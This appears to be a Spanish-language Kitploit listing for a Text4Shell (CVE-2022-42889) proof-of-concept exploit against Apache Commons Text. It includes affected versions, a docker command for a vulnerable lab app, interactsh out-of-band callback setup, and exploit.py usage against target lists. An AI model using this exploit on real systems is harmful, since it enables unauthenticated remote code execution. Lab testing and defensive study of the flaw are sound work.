Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
text4shell-exploit — CVE-2022-42889 - exploit de Text4Shell | Kitploit
Herramientas/GitHubGitHub/gokul-ramesh/text4shell-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubgokul-ramesh/text4shell-exploit

text4shell-exploit

CVE-2022-42889 - exploit de Text4Shell

Ver Repositorio
13hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Text4shell-exploit

Esto es una Prueba de Concepto que explota la vulnerabilidad en Apache Commons Text [CVE-2022-42889]

Versiones vulnerables: 1.5.0 a (sin incluir) 1.10.0

Impacto

La explotación exitosa de esta vulnerabilidad permite a un atacante no autenticado ejecutar código arbitrario en el activo vulnerable

Aplicación vulnerable para verificar el PoC

Aplicación desarrollada por @securekomodo, se adjunta aquí.

Docker

Esta aplicación también se puede cargar desde el registro de docker

root@kitploit:~
docker run -p 8080:8080 gokul2/text4shell-poc:latest

La aplicación estará disponible en localhost:8080 ahora.

Validación

Para verificar la ejecución arbitraria de comandos, usamos interactsh, una herramienta para capturar interacciones OOB de @projectdiscovery.

Configuración del cliente Interactsh

Configure el cliente interactsh antes de ejecutar el exploit real.

root@kitploit:~
docker run projectdiscovery/interactsh-client:latest

Tome nota del dominio que aparece después de iniciar la aplicación

root@kitploit:~
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro

Uso

root@kitploit:~
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]

Verificación

Revise los registros en el cliente interactsh para validar el exploit.

Descargar herramienta